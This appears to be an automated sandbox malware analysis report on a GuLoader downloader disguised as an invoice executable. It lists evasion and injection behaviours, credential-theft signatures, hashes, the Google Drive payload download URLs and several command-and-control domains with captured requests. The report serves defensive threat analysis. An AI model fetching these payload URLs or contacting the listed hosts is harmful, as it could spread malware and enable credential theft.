Windows Analysis Report
FACTURA A-7507_H1758.exe

Overview

General Information

Sample name: FACTURA A-7507_H1758.exe
Analysis ID: 1540403
MD5: 1595b77a26b3343c46fc12fc8ccdce82
SHA1: 415dd7002ea68c75d88dac10c54ba115fa73776b
SHA256: f58da2ed79308a85d7f82d865dcc6ed12b0fe9f654fc28afcdd344761935495e

Detection

GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • FACTURA A-7507_H1758.exe (PID: 1940 cmdline: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe" MD5: 1595B77A26B3343C46FC12FC8CCDCE82)
    • FACTURA A-7507_H1758.exe (PID: 3320 cmdline: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe" MD5: 1595B77A26B3343C46FC12FC8CCDCE82)
      • vCWtwarpbXUl.exe (PID: 1628 cmdline: "C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • ROUTE.EXE (PID: 6164 cmdline: "C:\Windows\SysWOW64\ROUTE.EXE" MD5: C563191ED28A926BCFDB1071374575F1)
          • vCWtwarpbXUl.exe (PID: 5492 cmdline: "C:\Program Files (x86)\KTovCZPwAEfLdyMaiKdNhYiGlitNomNEzhisVikkrg\vCWtwarpbXUl.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6596 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Configuration / Threatname

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

No configs have been found

Yara match
Source: 00000000.00000002.26333481443.00000000047A5000.00000040.00001000.00020000.00000000.sdmp
Rule: JoeSecurity_GuLoader_2
Description: Yara detected GuLoader
Author: Joe Security
Strings: none listed

    No Sigma rule has matched

    Suricata alert
    Timestamp: 2024-10-23T18:52:50.053174+0200
    SID: 2803270
    Severity: 2
    Classtype: Potentially Bad Traffic
    Source IP: 192.168.11.20
    Source Port: 49790
    Destination IP: 142.250.80.110
    Destination Port: 443
    Protocol: TCP

    AV Detection

    Source: FACTURA A-7507_H1758.exe, ReversingLabs: Detection: 36%
    Source: FACTURA A-7507_H1758.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknown, HTTPS traffic detected: 142.250.80.110:443 -> 192.168.11.20:49790 version: TLS 1.2
    Source: unknown, HTTPS traffic detected: 142.250.176.193:443 -> 192.168.11.20:49791 version: TLS 1.2
    Source: FACTURA A-7507_H1758.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: Binary string: route.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdb source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vCWtwarpbXUl.exe, 00000003.00000002.30689807826.000000000077E000.00000002.00000001.01000000.00000008.sdmp, vCWtwarpbXUl.exe, 00000005.00000000.26765175851.000000000077E000.00000002.00000001.01000000.00000008.sdmp
    Source: Binary string: wntdll.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: wntdll.pdb source: FACTURA A-7507_H1758.exe, FACTURA A-7507_H1758.exe, 00000002.00000003.26611799696.0000000035098000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26615161368.000000003524F000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, ROUTE.EXE, 00000004.00000003.26700487716.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000003.26703715181.000000000327C000.00000004.00000020.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.0000000003430000.00000040.00001000.00020000.00000000.sdmp, ROUTE.EXE, 00000004.00000002.30462678996.000000000355D000.00000040.00001000.00020000.00000000.sdmp
    Source: Binary string: mshtml.pdbUGP source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp
    Source: Binary string: route.pdbGCTL source: FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, vCWtwarpbXUl.exe, 00000003.00000003.29557511884.0000000000EAB000.00000004.00000001.00020000.00000000.sdmp
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_004064C1 FindFirstFileW,FindClose
    Source: C:\Users\user\Desktop\FACTURA A-7507_H1758.exe, Code function: 0_2_004027FB FindFirstFileW
    Source: C:\Windows\SysWOW64\ROUTE.EXE, Code function: 4_2_033104E8 4x nop then mov ebx, 00000004h

    Networking

    Source: DNS query: www.ruarlo.xyz
    Source: Joe Sandbox View, IP Address: 13.248.169.48
    Source: Joe Sandbox View, IP Address: 84.32.84.32
    Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
    Source: Joe Sandbox View, JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network traffic, Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49790 -> 142.250.80.110:443
    Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global traffic, HTTP traffic detected:
        GET /uc?export=download&id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Host: drive.google.com
        Cache-Control: no-cache
    Source: global traffic, HTTP traffic detected:
        GET /download?id=18R_I2LlsbLnU2tcUkX6lpHGt7UzbGPbM&export=download HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
        Cache-Control: no-cache
        Host: drive.usercontent.google.com
        Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /e0v8/?2rul-=BRLKzowcHpFkwiCaHOnpSWjmXz6pRQQbl5LLjDqiFhfX4i3Xo6uolyXZn4m1rAB7uwEzOtHNU3mZLRFYJya+3dmXpK/KMeaogPo3NqnUjbhI+XHqg4485wo=&Hh=g6BlO HTTP/1.1Host: www.binacamasala.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: GET /n7zc/?Hh=g6BlO&2rul-=4uIsvpMyaiNaEMynSWraJ/2ewRneyY2IM3xoEszCiepO+vQwtMzBLq4BvMD3ENezA07qcacnmpI/gT8KQ+99hp5F4iXZ7molM84vqZhw689aaRZynnXQiFE= HTTP/1.1Host: www.wrl-llc.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficDNS traffic detected: DNS query: drive.google.com
    Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
    Source: global trafficDNS traffic detected: DNS query: www.caprinaday.net
    Source: global trafficDNS traffic detected: DNS query: www.how2.guru
    Source: global trafficDNS traffic detected: DNS query: www.ruarlo.xyz
    Source: global trafficDNS traffic detected: DNS query: www.refs4refs.info
    Source: global trafficDNS traffic detected: DNS query: www.estrela-b.online
    Source: global trafficDNS traffic detected: DNS query: www.russe-trykk.online
    Source: global trafficDNS traffic detected: DNS query: www.1-mine.online
    Source: global trafficDNS traffic detected: DNS query: www.binacamasala.com
    Source: global trafficDNS traffic detected: DNS query: www.wrl-llc.net
    Source: global trafficDNS traffic detected: DNS query: www.xtelify.tech
    Source: global trafficDNS traffic detected: DNS query: www.bigliaserramenti.com
    Source: global trafficDNS traffic detected: DNS query: www.theawareness.shop
    Source: global trafficDNS traffic detected: DNS query: www.gokulmohan.online
    Source: global trafficDNS traffic detected: DNS query: www.3bbfibre3app.net
    Source: global trafficDNS traffic detected: DNS query: www.lichnyyrost.online
    Source: global trafficDNS traffic detected: DNS query: www.innovators.group
    Source: unknownHTTP traffic detected: POST /7eim/ HTTP/1.1Host: www.how2.guruAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brOrigin: http://www.how2.guruContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 202Referer: http://www.how2.guru/7eim/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3; MS-RTC LM 8; Tablet PC 2.0)
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Wed, 23 Oct 2024 16:53:26 GMTConnection: closeContent-Length: 5096
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:53:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:53:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:01 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:04 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:25 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 16:56:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XVKLD69Hnyy%2BdZ7o1AFUVnaVUCHjQy1SxSeZsk5%2F50Lk6bY9tMRMOL6CEJM8cmf%2BY5CQeGhezmipc6d6Y5fS02CDWSTn%2Fhc9RmLY%2FWF1oqAMpzqGR2fbeyQacGIbLCDJ%2BT2YFDeV%2Bt4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342ac88594314-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=95470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 16:56:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eiVmhfPeYp1S7Ho30%2BJwqzBfwRuAQvSoMWOfrMHRV8rTfCaiYrc7ViKBM8xQUTH1s3btQNS1DDF25nzL%2BZO%2BIuUyey%2F%2BpS2pvectLPiAT48uw0ptVfSfSuMD1Pfyuf08iWFw73QDnlw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342bcfab64338-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=94602&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 16:56:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOO3Xz7s0rOdztK0PpduxCIKD0KT1fF6nhIQHP5HjXUVae93kNcLcDhxFGpGgMI9Q1w25%2Fw4gVSUl85a73xVW9oaegZW4UbPMYRzwXMR8bpcxGOdQ5l7jYKrg2CPFqgclVAZnrEDuUg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342cd5df1726b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=94252&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7989&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:56:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTmoVit02TFPilnQKTr2EByKt%2B1zJLpLTJDBT541C%2BgYrd1DHfxQ67%2F%2BIdgSzSMvjXBSXfRmD%2BCOM3lbgWuvhOshphDRlGDLfZaFs8ZonY0xaW36udXnGqsoK1vQu%2BXjskTSrGk5Gs0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342ddcdf30cc8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=95266&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Ascii: c9b<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /rfuo/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; bac
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:56:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:56:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:56:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:57:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Wed, 23 Oct 2024 16:57:24 GMTConnection: closeContent-Length: 5096
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:42 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:57:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:58:10 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:58:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:58:15 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: ROUTE.EXE, 00000004.00000002.30463409490.000000000448C000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000003EDC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://estrela-b.online/65n9/?Hh=g6BlO&2rul-=ssXOrmKN3jSGgEpB8/Lr5wdtJLPOH5LoJxs9XTE68ACf17BnujIswIs
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmp String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
    Source: FACTURA A-7507_H1758.exe String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: ROUTE.EXE, 00000004.00000002.30463409490.0000000003E44000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000003894000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.26992521288.0000000035594000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.caprinaday.net:80/pv6s/?2rul-=X8hwKmufpxNrBOZ4UI9uvOrgRNyZ3XXX9OcroS
    Source: ROUTE.EXE, 00000004.00000002.30463409490.000000000511C000.00000004.10000000.00040000.00000000.sdmp, vCWtwarpbXUl.exe, 00000005.00000002.30693612539.0000000004B6C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.gokulmohan.online/rfuo/?Hh=g6BlO&amp;2rul-=HttO6gilRPhQm5AaUYCTEe/GFzQ3JRW7tnq3sC1VQlloj6
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
    Source: FACTURA A-7507_H1758.exe, 00000002.00000003.26612423287.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26486239663.0000000004F4E000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000002.26711858259.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455162964.0000000004F51000.00000004.00000020.00020000.00000000.sdmp, FACTURA A-7507_H1758.exe, 00000002.00000003.26455284277.0000000004F51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
    Source: FACTURA A-7507_H1758.exe, 00000002.00000001.26330069368.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
    Source: vCWtwarpbXUl.exe, 00000005.00000002.30691759310.0000000001466000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.wrl-llc.net
